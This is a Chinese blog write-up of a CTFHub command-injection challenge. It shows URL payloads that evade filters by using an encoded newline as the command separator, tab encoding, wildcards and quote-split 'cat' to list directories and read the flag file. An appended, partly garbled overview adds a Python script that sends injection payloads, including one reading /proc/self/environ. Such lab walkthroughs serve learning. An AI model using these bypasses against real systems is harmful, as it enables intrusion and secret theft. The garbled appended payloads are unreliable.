CTFHub技能树web(持续更新)--RCE--命令注入--综合过滤练习

综合过滤练习

这道题试了好多种方法,最后才发现需要在url里面改才可以,也是参考了大佬的链接
我是大佬链接

在这里插入图片描述
这道题能过滤的基本都过滤了,我们第一步应该想办法查看当前文件夹的内容,这里常用的管道符都不能用,只能用换行符的url编码 %0a,并且去要在url中修改:
在这里插入图片描述

?ip=127.0.0.1%0als#

看到了回显就看到了希望,接下来要进入到flag这个文件夹中来查看该文件夹的内容,这里flag被过滤了,又学到了一个新的知识点TAB的url编码,我们用这个把文件夹的名字补全:
在这里插入图片描述

?ip=127.0.0.1%0als%09*is_here#

接下来就是查看这个文件中的flag了,又又有新知识,因为cat被过滤了,我们可以使用单引号的url编码%27将cat的任意字母包裹:
在这里插入图片描述

?ip=127.0.0.1%0acd%09*is_here%0ac%27a%27t%09*_9436863016875.php#

最后一步就是查看网页源代码得到flag:
在这里插入图片描述

注:萌新第一次写write up,不足之处还请见谅,不对之处欢迎批评指正

### CTFHub平台上RCE(远程代码执行)相关的技能树或学习路径 #### 一、基础概念理解 深入理解和掌握远程代码执行的基础原理,包括但不限于漏洞产生的原因以及常见的触发方式。这不仅限于PHP环境下的`eval()`函数滥用,还包括其他编程语言和服务端组件可能存在的风险点。 #### 二、常见防御机制规避技巧 针对不同类型的输入验证与清理措施,探索有效的绕过方法。例如,在给定场景下,当遇到特定字符如`&`、`;`、`|`、`||`被过滤的情况时,可以考虑利用替代符号实现相同功能[^1]。另外,面对某些特殊字符串的限制,像本案例中的URL必须包含指定域名的要求,则可以通过引入`@`符号来进行巧妙处理[^2]。 #### 三、高级技术应用实例分析 结合实际目描述,了解到尽管存在多种命令组合受限的情形——比如管道符已被屏蔽但仍可借助分号作为指令间的连接工具完成多条语句的同时运行;同时注意到文件操作类API未加严格控制的事实,从而成功定位并读取目标敏感数据文件[^3]。此外,还展示了如何运用百分号编码形式(%XX)来应对更多复杂情况的发生,如采用 `%0a` 表示换行、`%09`代表Tab键位移效果,甚至是以 `%5c`转义反斜杠达到分割命令的目的[^4]。 ```python import requests url = "http://example.com/vuln.php?cmd=" payloads = [ "@echo%0aflag_is_here", # 使用 @ 符号绕过 URL 过滤,并用 %0a 替代换行 ";ls%0a-%la", # 利用 ; 分割命令,%0a 实现换行 "%5ccat%5c/proc/self/environ"# 转义后的 cat 命令用于读取环境变量 ] for payload in payloads: response = requests.get(url + payload) print(response.text) ```
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值